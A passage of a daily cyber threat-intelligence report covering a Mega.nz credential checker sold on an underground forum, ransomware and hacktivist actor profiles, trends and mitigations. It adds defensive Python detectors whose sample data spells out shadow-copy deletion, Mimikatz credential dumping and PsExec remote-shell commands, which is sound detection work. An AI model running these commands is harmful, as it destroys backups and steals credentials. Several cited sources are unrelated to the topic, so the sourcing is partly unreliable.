  • Details: Claimed on 2025-04-21T00:17:56Z. Category: Malware. Network: Openweb (exploit.in forum). An actor named “CloudByte” is advertising a tool called “Mega Checker Pro” for sale on the exploit.in forum. This tool is described as a multifunctional checker for accounts on the Mega.nz file hosting service. Claimed features include support for multithreading (for speed), proxy configurations (for evasion and bypassing rate limits), keyword searches within accounts, file upload capabilities, and detailed logging. The tool is marketed as user-friendly and a competitor to similar checkers, with offers of free updates and installation assistance.
  • Threat Actor Profile: CloudByte
  • Background: “CloudByte” appears to be a software developer and vendor specializing in credential checking tools, operating on the exploit.in underground forum. Their motivation is financial gain through the sale of these specialized tools. This particular tool targets the popular Mega.nz cloud storage service. No further specific information on this actor was found.
  • TTPs: The primary TTP is software development, specifically creating automated tools for credential verification. The checker tool likely interacts with Mega.nz’s API or web login interface to test large lists of username/password combinations (often sourced from previous data breaches, known as “combo lists”). Features like multithreading and proxy support are standard for enabling large-scale, efficient checking while attempting to avoid detection or blocking by the targeted service. Marketing and selling the tool on underground forums is the distribution method.
  • Targets & Motivations: The actor is financially motivated by the sale of the tool. The tool itself enables other cybercriminals to perform large-scale Account Takeover (ATO) attacks against Mega.nz users. Buyers purchase the tool to identify valid Mega accounts within large credential lists. Compromised Mega accounts are valuable to criminals for various purposes: accessing sensitive personal or corporate files stored by legitimate users, hosting and distributing illegal content (e.g., malware, stolen data), or potentially using the storage as part of command-and-control infrastructure. The existence and sale of such specialized checkers for popular online services like Mega underscores the thriving underground economy that supports ATO activities and the abuse of legitimate platforms for illicit purposes.
  • Evidence:
  • Published URL: https://forum.exploit.in/topic/257775/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/17a83691-20dc-4085-9472-c3ef4c8d806d.png
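
A checker with multithreading and proxy rotation leaves two different footprints in a service’s authentication log: one address cycling through many usernames at machine speed, or many addresses each trying one or two usernames inside the same few seconds. Per-IP rate limits catch only the first. The detection below is an added example for this report, written from the defender’s side and not taken from Mega.nz or from the tool being sold; the log format, thresholds and addresses are constructed assumptions (the addresses are from the documentation ranges).

```python
"""Account-takeover checking detected from constructed authentication logs.
Two signals: one source testing many usernames (single-IP spray) and many
sources failing against many usernames in one window (proxy-rotated run)."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

LINE_RE = re.compile(r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$")

# Constructed sample log, not real traffic. 203.0.113.7 runs a multithreaded
# checker; 198.51.100.x are rotating proxies; 192.0.2.10 is a normal user.
SAMPLE_LOG = """\
2025-04-21T00:17:56Z ip=203.0.113.7 user=alice result=FAIL
2025-04-21T00:17:56Z ip=203.0.113.7 user=bob result=FAIL
2025-04-21T00:17:57Z ip=203.0.113.7 user=carol result=FAIL
2025-04-21T00:17:57Z ip=203.0.113.7 user=dave result=OK
2025-04-21T00:17:58Z ip=203.0.113.7 user=erin result=FAIL
2025-04-21T00:17:58Z ip=203.0.113.7 user=frank result=FAIL
2025-04-21T00:18:01Z ip=198.51.100.1 user=grace result=FAIL
2025-04-21T00:18:01Z ip=198.51.100.2 user=heidi result=FAIL
2025-04-21T00:18:02Z ip=198.51.100.3 user=ivan result=FAIL
2025-04-21T00:18:02Z ip=198.51.100.4 user=judy result=OK
2025-04-21T00:18:03Z ip=198.51.100.5 user=mallory result=FAIL
2025-04-21T00:18:03Z ip=198.51.100.6 user=oscar result=FAIL
2025-04-21T00:18:40Z ip=192.0.2.10 user=peggy result=FAIL
2025-04-21T00:18:47Z ip=192.0.2.10 user=peggy result=OK
"""


def parse(text):
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated lines are skipped, not treated as errors
        e = m.groupdict()
        e["ts"] = datetime.fromisoformat(e["ts"].replace("Z", "+00:00"))
        events.append(e)
    return events


def _windows(evs, window):
    """Yield every trailing window of events that lie within `window` of the last one."""
    evs = sorted(evs, key=lambda e: e["ts"])
    start = 0
    for end in range(len(evs)):
        while evs[end]["ts"] - evs[start]["ts"] > window:
            start += 1
        yield evs[start:end + 1]


def single_source_spray(events, window=timedelta(minutes=5), min_users=5, max_ok_ratio=0.3):
    """IPs that tried at least min_users distinct accounts within `window`
    and mostly failed: one multithreaded checker behind a single address."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    flagged = {}
    for ip, evs in by_ip.items():
        for win in _windows(evs, window):
            users = {e["user"] for e in win}
            ok_ratio = sum(e["result"] == "OK" for e in win) / len(win)
            if len(users) >= min_users and ok_ratio <= max_ok_ratio:
                flagged[ip] = sorted(users)
                break
    return flagged


def distributed_run(events, window=timedelta(minutes=1), min_ips=5, min_users=5, min_fail_ratio=0.7):
    """First window in which many distinct sources fail against many distinct
    accounts: the proxy-rotated pattern that per-IP thresholds miss. Every IP
    active in the window is returned, because a rotated node that only hit a
    valid credential pair never fails at all."""
    for win in _windows(events, window):
        fails = [e for e in win if e["result"] == "FAIL"]
        if len(fails) / len(win) < min_fail_ratio:
            continue
        ips = {e["ip"] for e in win}
        users = {e["user"] for e in fails}
        if len(ips) >= min_ips and len(users) >= min_users:
            return {"start": win[0]["ts"], "end": win[-1]["ts"], "ips": sorted(ips), "users": sorted(users)}
    return None


def compromised_accounts(events):
    """Accounts that logged in successfully from a source flagged by either signal."""
    attacker_ips = set(single_source_spray(events))
    run = distributed_run(events)
    if run:
        attacker_ips |= set(run["ips"])
    return {e["user"] for e in events if e["result"] == "OK" and e["ip"] in attacker_ips}


if __name__ == "__main__":
    evs = parse(SAMPLE_LOG)
    print("spray sources:", single_source_spray(evs))
    print("distributed run:", distributed_run(evs))
    print("accounts to reset:", sorted(compromised_accounts(evs)))
```

The output that matters operationally is the last line: the accounts whose valid credentials the checker confirmed, which need a forced reset and session revocation regardless of whether the source addresses are blocked. The window-based approach deliberately includes successful logins from within the run, since the one success among a burst of failures is the confirmed hit the attacker was looking for.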

4. Threat Actor Spotlight

This section provides a consolidated overview of the key threat actors observed in today’s reporting period, summarizing their characteristics, common TTPs, and potential implications.

  • Qilin (Agenda):
  • Summary: A highly active RaaS operation, likely of Russian origin, employing double extortion tactics since July 2022.4 Qilin is recognized for its sophisticated ransomware, available in both Go and Rust variants, enabling customization by affiliates.2 The group demands high ransoms and targets a diverse range of global sectors opportunistically.2 Two incidents involving Qilin were reported today, targeting financial services in Canada and real estate in the US.
  • Key TTPs: Initial access is commonly gained via phishing or exploiting vulnerabilities in external services (e.g., Fortinet VPNs, Veeam software).1 Post-compromise activities involve the use of RMM tools, Cobalt Strike 4, lateral movement via PsExec/SSH 2, process injection for evasion 5, and disabling defenses and deleting backups/shadow copies.1 Encryption utilizes AES/ChaCha20/RSA.2 Key MITRE ATT&CK TTPs include T1133 (External Remote Services), T1190 (Exploit Public-Facing Application), T1566 (Phishing), T1059 (Command and Scripting Interpreter), T1055 (Process Injection), T1078 (Valid Accounts), T1112 (Modify Registry), T1484.001 (Domain or Tenant Policy Modification: Group Policy Modification), T1562.001 (Impair Defenses: Disable or Modify Tools), T1490 (Inhibit System Recovery), T1486 (Data Encrypted for Impact).
  • Implications: Qilin remains a significant global threat due to the scalability of its RaaS model, the advanced capabilities of its ransomware (particularly the Rust variant), and its broad, opportunistic targeting strategy. Defending against Qilin requires robust vulnerability management, effective anti-phishing controls, comprehensive EDR monitoring, and reliable backup solutions.
  • Hunters International:
  • Summary: A RaaS group that emerged in late 2023, exhibiting strong operational and code similarities to the defunct Hive ransomware group, suggesting a potential rebrand or succession.26 Hunters International places a primary emphasis on data exfiltration, often employing double extortion but sometimes foregoing encryption altogether.28 They utilize Rust-based ransomware and custom tools like the SharpRhino backdoor and Storage Software.26 Reports suggested a potential rebranding to “World Leaks” in early 2025, focusing solely on data extortion.28 Today, they were observed targeting a healthcare organization in Belgium.
  • Key TTPs: Initial access vectors include exploiting vulnerabilities (e.g., Oracle WebLogic, Citrix Bleed, Fortinet flaws) 27, compromising RDP/VPN access 19, and phishing.31 Lateral movement is achieved using RDP, RMM tools (AnyDesk, TeamViewer), Plink, and Impacket.27 Credential theft involves Mimikatz and dumping registry hives.19 Data exfiltration frequently targets cloud storage services like MEGA.27 They actively disable backup mechanisms.26 Key MITRE ATT&CK TTPs include T1190 (Exploit Public-Facing Application), T1133 (External Remote Services), T1566 (Phishing), T1078 (Valid Accounts), T1003 (OS Credential Dumping), T1021.001 (Remote Desktop Protocol), T1219 (Remote Access Software), T1570 (Lateral Tool Transfer), T1567.002 (Exfiltration Over Web Service: Exfiltration to Cloud Storage), T1486 (Data Encrypted for Impact), T1490 (Inhibit System Recovery).
  • Implications: Hunters International represents an adaptable and potent threat, leveraging the value of stolen data as its primary extortion tool. Their potential connection to the experienced Hive operators suggests significant capability. Defenses must prioritize vulnerability management, monitor for unauthorized RMM tool usage, and implement robust detection for large data outflows, particularly to cloud platforms.
  • LockBit 3.0:
  • Summary: Historically one of the most dominant RaaS operations, LockBit suffered a major disruption through Operation Cronos in February 2024, which dismantled infrastructure and identified leadership.40 Despite this, attacks attributed to LockBit 3.0 continue, likely facilitated by the decentralized affiliate structure, remaining operational infrastructure, or the use of the LockBit 3.0 builder that was leaked in 2022.35 An attack targeting an Italian wholesale company was reported today.
  • Key TTPs: The LockBit RaaS model relies on affiliates for intrusions.39 Common initial access methods include RDP compromise, phishing, and exploiting known vulnerabilities.34 Post-exploitation often involves tools like Cobalt Strike, Mimikatz, and PsExec.34 The LockBit 3.0 ransomware features anti-analysis techniques (password protection, language checks) 36 and actively works to hinder recovery by deleting shadow copies and logs.34 The operation employs double or triple extortion models.37 Key MITRE ATT&CK TTPs include T1133, T1566, T1190, T1078, T1059, T1003, T1021, T1570, T1486, T1490, T1070 (Indicator Removal), T1562 (Impair Defenses).
  • Implications: The persistence of LockBit 3.0 attacks highlights the resilience of the RaaS ecosystem. Even significant law enforcement actions may not fully eradicate a threat when its tools (like the leaked builder) become publicly available. Organizations must continue to defend against LockBit’s known TTPs, recognizing that attribution to the original core group is now complex.
  • Emerging Ransomware (Sarcoma, NightSpire):
  • Summary: Sarcoma (emerged late 2023/Oct 2024) 19 and NightSpire (emerged Mar 2025) 58 represent newer ransomware operations that have quickly accumulated victims. Both utilize double extortion tactics. Today, Sarcoma targeted a civil engineering firm in Brazil, while NightSpire hit a French municipality.
  • Key TTPs: These groups likely gain access via common methods like vulnerability exploitation and phishing.21 They have been observed using legitimate tools (WinSCP, MEGACmd) and LOLBins for defense evasion and data exfiltration.58 They may employ aggressive pressure tactics during extortion.58
  • Implications: The rapid emergence and scaling of groups like Sarcoma and NightSpire demonstrate the relatively low barrier to entry and the dynamic nature of the current RaaS landscape.22 Even groups assessed as potentially less sophisticated 58 can inflict significant damage through data theft and extortion, posing threats particularly to organizations with limited security resources. Continuous monitoring for new threat actor activity is essential.
  • Hacktivist Groups (Anonymous Italia, Cyber shade unit, R00TK1T):
  • Summary: Anonymous Italia continued its campaign of defacements against Russian websites [Incidents 13, 17, 21], consistent with its established anti-invasion stance [45]. Cyber shade unit made bold claims of deep system compromise and disruption against diverse targets in the UAE, Ukraine, and India. R00TK1T ISC CYBER TEAM claimed a significant data breach against the major drone manufacturer DJI [33].
  • Key TTPs: Activities range from lower-sophistication defacement and DDoS attacks (Anonymous Italia) [45] to potentially more advanced intrusions involving vulnerability exploitation and data theft, as claimed by Cyber shade unit and R00TK1T. Communication and claims are primarily disseminated via Telegram and dark web forums.
  • Implications: Geopolitical conflicts and tensions remain a significant driver for hacktivist activity [57]. While many hacktivist attacks are primarily disruptive or aimed at propaganda, the claims made by groups like Cyber shade unit and R00TK1T, if accurate, suggest a potential blurring of lines with more capable cybercrime or state-sponsored operations [54]. Organizations may become targets based on nationality, perceived political alignment, or symbolic value, requiring awareness of politically motivated threats alongside financially driven ones.

5. Emerging Threats & Trends

Analysis of the incidents reported over the past 24 hours reveals several key trends and emerging threats shaping the current cybersecurity landscape:

  • RaaS Ecosystem Resilience and Evolution: Despite significant law enforcement successes, such as the disruption of LockBit [41], the Ransomware-as-a-Service (RaaS) model demonstrates remarkable resilience. The continued activity of LockBit 3.0 affiliates or users of its leaked builder [35], the emergence of potent new groups like Sarcoma [19] and NightSpire [58], and the rapid rise of operations like RansomHub (often absorbing affiliates from defunct groups like BlackCat [19]) illustrate this adaptability. The cybercrime ecosystem readily adjusts, with affiliates migrating between platforms [63] and new groups leveraging leaked source code [22] or purchased codebases [63] to quickly establish operations. This indicates that disrupting individual groups, while impactful, does not dismantle the underlying business model that fuels ransomware proliferation.
  • Data Exfiltration as the Primary Extortion Lever: A clear trend observed across multiple ransomware groups (Qilin [5], Hunters International [28], LockBit 3.0 [37], Sarcoma [20], NightSpire [58]) is the prioritization of data exfiltration as part of a double or triple extortion strategy. Some groups, like Hunters International, may even forgo encryption entirely in certain cases, relying solely on the threat of leaking stolen data [26]. This strategic shift likely reflects attackers’ calculation that the threat of data exposure, with its associated regulatory fines, reputational damage, and operational disruption, can be as effective as, or more effective than, holding systems hostage via encryption, particularly if victims have implemented robust backup strategies. This necessitates a stronger defensive focus on preventing, detecting, and responding to data exfiltration attempts, including monitoring for large data transfers to cloud storage services [27].
  • Thriving Initial Access Broker (IAB) Market: The incidents involving the sale of SMTP access (b1gb0y75) and compromised e-commerce site access (Clawson) highlight the continued activity and importance of the IAB market. These brokers specialize in gaining initial footholds into organizations and selling that access to other threat actors, who then carry out subsequent attacks like ransomware deployment, BEC scams, or espionage. This specialization lowers the barrier to entry for sophisticated attacks, as ransomware affiliates or other criminals can simply purchase access rather than needing the skills and resources to achieve the initial breach themselves. Securing common entry points like RDP, VPNs, email systems, and web applications remains critical to disrupting this supply chain.
  • Commoditization of Advanced Malware and Tools: The sale of tools like “Baldwin Killer” [Incident 14], claiming advanced EDR/AV evasion, rootkit capabilities, and stealth features, alongside credential checkers like “Mega Checker Pro” [Incident 22], demonstrates the ongoing commoditization of sophisticated attack tools on underground forums. This availability means advanced TTPs, once the domain of highly skilled actors, can be purchased and utilized by a wider range of cybercriminals. This accelerates the arms race, forcing defenders to move beyond signature-based detection towards more advanced behavioral analysis and endpoint protection strategies capable of identifying the misuse of legitimate tools or novel evasion techniques [44].
  • Geopolitically Motivated Hacktivism: The persistent anti-Russia defacement campaign by Anonymous Italia [Incidents 13, 17, 21] and the potentially politically motivated claims by Cyber shade unit (targeting Ukraine, among others) and R00TK1T (targeting a major Chinese firm) underscore the link between real-world geopolitical events and cyber activity [45]. Hacktivist groups continue to use cyberattacks as a form of protest, propaganda, or disruption. While often employing less sophisticated methods like DDoS or defacement, the potential for more significant impact exists, and organizations can become targets based purely on their nationality or perceived affiliations, regardless of their direct involvement in conflicts.

6. Mitigation Recommendations

Based on the observed TTPs and prevailing threats, organizations should prioritize the following mitigation strategies:

  • Prioritize Vulnerability Management: Aggressively patch known exploited vulnerabilities, particularly those affecting internet-facing systems, VPN gateways (e.g., Fortinet [2]), backup solutions (e.g., Veeam [2]), web servers (e.g., Oracle WebLogic [27]), and other software frequently targeted by ransomware actors like Qilin, Hunters International, and LockBit affiliates [31]. Implement a robust scanning and patching program with risk-based prioritization.
  • Secure Remote Access: Mandate the use of strong, unique passwords combined with phishing-resistant Multi-Factor Authentication (MFA) for all remote access solutions (RDP, VPNs), cloud services, email accounts, and administrative interfaces [37]. Minimize the exposure of RDP and other management ports to the public internet [43]. Continuously monitor for anomalous login activities and brute-force attempts.
  • Enhance Email Security: Deploy advanced email security solutions capable of detecting and blocking sophisticated phishing attempts, malicious attachments, and malicious links [1]. Conduct regular security awareness training to educate users on identifying and reporting phishing emails and social engineering tactics [1]. Secure SMTP configurations to prevent unauthorized relay or abuse (relevant to Incident 2).
  • Endpoint Detection and Response (EDR): Implement and properly configure EDR solutions with behavioral detection capabilities. Ensure they can detect and block common ransomware TTPs, including the execution of suspicious scripts (PowerShell), credential dumping tools (Mimikatz) [19], lateral movement techniques (PsExec, RMM abuse [4]), and attempts to tamper with security software or system recovery mechanisms [34]. Monitor for unusual process chains (e.g., java.exe spawning cmd.exe [27]) and enable anti-ransomware specific features [34].
  • Data Backup and Recovery: Maintain a comprehensive backup strategy with regular, tested backups stored offline or in immutable storage, segregated from the primary network [1]. Monitor for activities indicative of backup tampering, such as attempts to delete Volume Shadow Copies using vssadmin.exe [2].
  • Network Segmentation and Least Privilege: Implement network segmentation to limit the blast radius of a potential compromise and hinder lateral movement [43]. Enforce the principle of least privilege for user accounts and service permissions to restrict attacker access to sensitive systems and data [43].
  • Monitor for Data Exfiltration: Deploy Data Loss Prevention (DLP) tools and actively monitor network traffic for signs of large-scale data exfiltration, paying particular attention to outbound connections to known cloud storage platforms (e.g., MEGA [27]), file sharing sites, or unusual IP addresses. Analyze traffic volumes and patterns for anomalies.
  • Leverage Threat Intelligence: Stay informed about the latest TTPs, IoCs, and targeted vulnerabilities associated with active threat actors like Qilin, Hunters International, LockBit, Sarcoma, NightSpire, and emerging groups [1]. Utilize threat intelligence feeds to enrich security alerts and proactively hunt for threats within the environment. Monitor dark web forums and public breach notification channels for mentions related to your organization or supply chain partners.
  • Maintain and Test Incident Response Plan: Ensure a comprehensive incident response plan is documented, regularly updated, and tested through tabletop exercises or simulations. This plan should outline clear steps for containment, eradication, recovery, and communication in the event of a ransomware attack or major data breach.
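The EDR, backup-tampering and exfiltration-monitoring recommendations above describe detections in prose only. The following is an added example, not part of this report or of any cited vendor's tooling, that expresses those detections as simple rules run over constructed Windows process-creation events and outbound network flows. It covers the behaviours the report names (vssadmin.exe shadow copy deletion, java.exe spawning cmd.exe, Mimikatz, PsExec, bulk transfers to MEGA) and generalizes slightly to closely related variants (wmic shadowcopy deletion, java.exe spawning powershell.exe). The event classes, the 500 MiB exfiltration threshold and the MEGA hostname list are assumptions to be tuned against an environment's own telemetry; all sample events are constructed.

```python
"""Rule-style detections for ransomware TTPs named in the report.
Added example; event shapes, thresholds and sample data are constructed."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # path of the new process (Sysmon EID 1 / Security 4688 style)
    command_line: str
    parent_image: str


@dataclass(frozen=True)
class NetEvent:
    image: str          # process that opened the connection
    dest_host: str      # resolved destination hostname
    bytes_out: int      # bytes sent in this flow


# MEGA is the cloud-storage destination named in the report; extend per environment (assumed list).
CLOUD_STORAGE_SUFFIXES = ("mega.nz", "mega.co.nz", "mega.io")
EXFIL_BYTES_THRESHOLD = 500 * 1024 * 1024   # assumed 500 MiB per process/host; tune to baseline


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_shadow_copy_tampering(ev: ProcessEvent) -> bool:
    """T1490: vssadmin or wmic used to delete or starve Volume Shadow Copies."""
    name, cl = _basename(ev.image), ev.command_line.lower()
    if name == "vssadmin.exe":
        return ("delete" in cl and "shadows" in cl) or ("resize" in cl and "shadowstorage" in cl)
    if name == "wmic.exe":
        return "shadowcopy" in cl and "delete" in cl
    return False


def is_suspicious_java_child(ev: ProcessEvent) -> bool:
    """Web/application server (java.exe) spawning a shell: the WebLogic-style process chain the report cites."""
    return _basename(ev.parent_image) == "java.exe" and _basename(ev.image) in {"cmd.exe", "powershell.exe"}


def is_credential_dumping_tool(ev: ProcessEvent) -> bool:
    """T1003: Mimikatz by image name or by its module syntax on the command line (renamed binaries)."""
    return _basename(ev.image) == "mimikatz.exe" or "sekurlsa::" in ev.command_line.lower()


def is_psexec_lateral_movement(ev: ProcessEvent) -> bool:
    """T1570/T1021: PsExec client binaries or the service it drops on the remote host."""
    return _basename(ev.image) in {"psexec.exe", "psexec64.exe", "psexesvc.exe"}


PROCESS_RULES = {
    "T1490 shadow copy tampering": is_shadow_copy_tampering,
    "java.exe spawning shell": is_suspicious_java_child,
    "T1003 credential dumping tool": is_credential_dumping_tool,
    "T1570 PsExec lateral movement": is_psexec_lateral_movement,
}


def detect_process_events(events):
    """Return (rule_name, command_line) for every event that matches a rule."""
    return [(rule, ev.command_line) for ev in events for rule, fn in PROCESS_RULES.items() if fn(ev)]


def detect_cloud_exfil(events, threshold=EXFIL_BYTES_THRESHOLD):
    """Sum outbound bytes per (process, host) for cloud-storage domains; flag totals over threshold."""
    totals = defaultdict(int)
    for ev in events:
        host = ev.dest_host.lower()
        if any(host == s or host.endswith("." + s) for s in CLOUD_STORAGE_SUFFIXES):
            totals[(_basename(ev.image), host)] += ev.bytes_out
    return [(img, host, n) for (img, host), n in totals.items() if n >= threshold]


# Constructed sample telemetry (not real incident data).
SAMPLE_PROCESS_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe delete shadows /all /quiet", r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami", r"C:\Oracle\Middleware\jdk\bin\java.exe"),
    ProcessEvent(r"C:\Users\Public\mk.exe", "mk.exe privilege::debug sekurlsa::logonpasswords", r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Tools\PsExec64.exe", r"PsExec64.exe \\FILESRV01 -s cmd.exe", r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt", r"C:\Windows\explorer.exe"),
]
SAMPLE_NET_EVENTS = [
    NetEvent(r"C:\Users\Public\MEGAcmdServer.exe", "g.api.mega.co.nz", 400 * 1024 * 1024),
    NetEvent(r"C:\Users\Public\MEGAcmdServer.exe", "g.api.mega.co.nz", 200 * 1024 * 1024),
    NetEvent(r"C:\Program Files\Mozilla Firefox\firefox.exe", "mega.nz", 2 * 1024 * 1024),
]

if __name__ == "__main__":
    for hit in detect_process_events(SAMPLE_PROCESS_EVENTS):
        print("PROCESS", hit)
    for hit in detect_cloud_exfil(SAMPLE_NET_EVENTS):
        print("EXFIL", hit)
```

Against the sample data the process rules fire once each on the first four events and stay silent on the benign notepad.exe launch, and the exfiltration check aggregates the two MEGAcmdServer.exe flows (600 MiB in total) rather than judging each flow alone, which is what lets it catch transfers split into smaller chunks; the small browser flow to mega.nz stays below the threshold. In production the same logic would sit in a SIEM or EDR rule language, and the per-host threshold would be set from a baseline of normal cloud-storage use.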

Works cited

  1. Threat Briefing: Understanding and Defending Against Russian Ransomware Group Qilin, accessed April 21, 2025, https://adarma.com/blog/russian-ransomware-group-qilin/
  2. Qilin Ransomware: Exposing the TTPs Behind One of the Most …, accessed April 21, 2025, https://www.picussecurity.com/resource/blog/qilin-ransomware
  3. Qilin Ransomware: What You Need To Know – Tripwire, accessed April 21, 2025, https://www.tripwire.com/state-of-security/qilin-ransomware-what-you-need-know
  4. qilin-threat-profile-tlpclear.pdf – HHS.gov, accessed April 21, 2025, https://www.hhs.gov/sites/default/files/qilin-threat-profile-tlpclear.pdf
  5. Threat Actor Profile: Qilin Ransomware Group – Cyble, accessed April 21, 2025, https://cyble.com/threat-actor-profiles/qilin-ransomware-group/
  6. Vulnerability Vortex: Escaping the Whirlpool of Ineffective Security | Rapid7 Blog, accessed April 21, 2025, https://www.rapid7.com/blog/post/2025/01/24/the-vulnerability-vortex-escaping-the-whirlpool-of-ineffective-security/
  7. Escaping the Vulnerability Vortex: Securing Code for a Safer Tomorrow – CloudDefense.AI, accessed April 21, 2025, https://www.clouddefense.ai/escape-the-vulnerability-vortex/
  8. Navigating the Cybersecurity Landscape: The Importance of CVE, CVSS, and MITRE ATT&CK for IT Professionals – IT Vortex, accessed April 21, 2025, https://www.theitvortex.com/navigating-the-cybersecurity-landscape-the-importance-of-cve-cvss-and-mitre-attck-for-it-professionals/
  9. VORTEX Cybersecurity, accessed April 21, 2025, https://www.vortexcloud.com/platform/cybersecurity
  10. CrowdStrike Threat Landscape: APTs & Adversary Groups, accessed April 21, 2025, https://www.crowdstrike.com/adversaries/
  11. Vortex of Conflict: U.S. Policy Toward Afghanistan, Pakistan, and Iraq 9780804777490, accessed April 21, 2025, https://dokumen.pub/vortex-of-conflict-us-policy-toward-afghanistan-pakistan-and-iraq-9780804777490.html
  12. Saudi Arabia: Modernity, Stability, and the Twenty-First Century Monarchy – DTIC, accessed April 21, 2025, https://apps.dtic.mil/sti/tr/pdf/ADA620023.pdf
  13. machine1337/machine1337 – GitHub, accessed April 21, 2025, https://github.com/machine1337/machine1337
  14. Threat Actor Profile: ScarCruft / APT37 – SOCRadar® Cyber Intelligence Inc., accessed April 21, 2025, https://socradar.io/threat-actor-profile-scarcruft-apt37/
  15. Threat Actor Profiles – Cyble, accessed April 21, 2025, https://cyble.com/threat-actor-profiles/
  16. Threat Actor Profiles – SOCRadar® Cyber Intelligence Inc., accessed April 21, 2025, https://socradar.io/category/threat-actor-profiles/
  17. The Threat Actor Profile Guide for CTI Analysts.txt – GitHub, accessed April 21, 2025, https://github.com/curated-intel/Threat-Actor-Profile-Guide/blob/main/The%20Threat%20Actor%20Profile%20%20Guide%20for%20CTI%20Analysts.txt
  18. Threat Research Report: How AI Assistants, Co-Pilots, and Chatbots Create New Cyber Threats – MixMode AI, accessed April 21, 2025, https://mixmode.ai/blog/threat-research-report-how-ai-assistants-co-pilots-and-chatbots-create-new-cyber-threats/
  19. Last Year in Ransomware: Top Ransomware Groups and Emerging Threat Actors – Halcyon, accessed April 21, 2025, https://www.halcyon.ai/blog/last-year-in-ransomware-top-ransomware-groups-and-emerging-threat-actors
  20. Weekly Intelligence Report – 18 Apr 2025 – cyfirma, accessed April 21, 2025, https://www.cyfirma.com/news/weekly-intelligence-report-18-apr-2025/
  21. Unimicron Purportedly Subjected to Sarcoma Ransomware Attack | MSSP Alert, accessed April 21, 2025, https://www.msspalert.com/brief/unimicron-purportedly-subjected-to-sarcoma-ransomware-attack
  22. Dragos Industrial Ransomware Analysis: Q4 2024, accessed April 21, 2025, https://www.dragos.com/blog/dragos-industrial-ransomware-analysis-q4-2024/
  23. Sarcoma Ransomware Exploits Zero-Day Vulnerability in Smart Media Group Bulgaria’s Network – Rescana, accessed April 21, 2025, https://www.rescana.com/post/sarcoma-ransomware-exploits-zero-day-vulnerability-in-smart-media-group-bulgaria-s-network
  24. Weekly Top 10: 02.17.2025: DragonRank Seen Exploiting IIS Servers Across Asia; PostgreSQL Vulnerabilities Used to Breach BeyondTrust; Sarcoma Ransomware Operation Breached Unimicron, and More. – Innovate Cybersecurity | Threat Advisory, News, and Events, accessed April 21, 2025, https://innovatecybersecurity.com/security-threat-advisory/weekly-top-10-02-17-2025-dragonrank-seen-exploiting-iis-servers-across-asia-postgresql-vulnerabilities-used-to-breach-beyondtrust-sarcoma-ransomware-operation-breached-unimicron-and-more/
  25. Weekly Intelligence Report – 11 Apr 2025 – cyfirma, accessed April 21, 2025, https://www.cyfirma.com/news/weekly-intelligence-report-11-apr-2025/
  26. Hunters International Ransomware – Blackpoint, accessed April 21, 2025, https://blackpointcyber.com/threat-profile/hunters-international-ransomware/
  27. Hunters International Ransomware: Tactics, Impact, and Defense Strategies – Picus Security, accessed April 21, 2025, https://www.picussecurity.com/resource/blog/hunters-international-ransomware
  28. The beginning of the end: the story of Hunters International | Group …, accessed April 21, 2025, https://www.group-ib.com/blog/hunters-international-ransomware-group/
  29. Hunters International Ransomware – Blackpoint Cyber, accessed April 21, 2025, https://blackpointcyber.com/wp-content/uploads/2024/10/Hunters-International.pdf
  30. Threat Profile: Hunters International Ransomware Group – Adarma, accessed April 21, 2025, https://adarma.com/blog/hunters-ransomware-group/
  31. Hunters International: A Deep Dive Into The Evolution Of A Stealthy Ransomware Group, accessed April 21, 2025, https://www.ampcuscyber.com/shadowopsintel/hunters-international-a-deep-dive-into-the-evolution-of-a-stealthy-ransomware-group/
  32. Hunters International Ransomware: What We Learned – Forescout, accessed April 21, 2025, https://www.forescout.com/blog/hunters-international-ransomware-what-we-learned-from-an-oracle-ws-attack/
  33. Daily Drop (695): John Deere: Starlink, UK: Cyber Abroad, UNODC, accessed April 21, 2025, https://substack.com/home/post/p-140729626?utm_campaign=post&utm_medium=web
  34. THREAT ANALYSIS: Assemble LockBit 3.0 – Cybereason, accessed April 21, 2025, https://www.cybereason.com/blog/threat-analysis-assemble-lockbit-3
  35. LockBit in Focus: Ransomware, Cyber Attacks, and Takedowns – CybelAngel, accessed April 21, 2025, https://cybelangel.com/lockbit-cybercriminal-guide/
  36. Lockbit 3.0 Analysis: How to Enhance Ransomware Protection, accessed April 21, 2025, https://www.txone.com/blog/malware-analysis-lockbit-3-0/
  37. lockbit-3-analyst-note.pdf – HHS.gov, accessed April 21, 2025, https://www.hhs.gov/sites/default/files/lockbit-3-analyst-note.pdf
  38. LockBit Takedown Advisory Alert – What We Know – Lumu Technologies, accessed April 21, 2025, https://lumu.io/lockbit-takedown-advisory-alert-what-we-know/
  39. LockBit Analysis – Truesec, accessed April 21, 2025, https://www.truesec.com/hub/blog/lockbit-analysis
  40. Ransomware & Extortion Activity in 2024: A Year in Review | Analyst1, accessed April 21, 2025, https://analyst1.com/ransomware-extortion-activity-in-2024-a-year-in-review/
  41. Learning from the LockBit Takedown – Akamai, accessed April 21, 2025, https://www.akamai.com/blog/security/learning-from-the-lockbit-takedown
  42. The LockBit takedown – Global Initiative Against Transnational Organized Crime, accessed April 21, 2025, https://globalinitiative.net/analysis/the-lockbit-takedown-law-enforcement-trolls-ransomware-gang/
  43. LockBit: The World’s Most Active Ransomware Group | Flashpoint, accessed April 21, 2025, https://flashpoint.io/blog/lockbit/
  44. #StopRansomware: LockBit 3.0 | CISA, accessed April 21, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
  45. Cyber Dimensions – CyberPeace Institute, accessed April 21, 2025, https://cyberpeaceinstitute.org/wp-content/uploads/2023/05/Ukraine-Report-Q1_FINAL.pdf
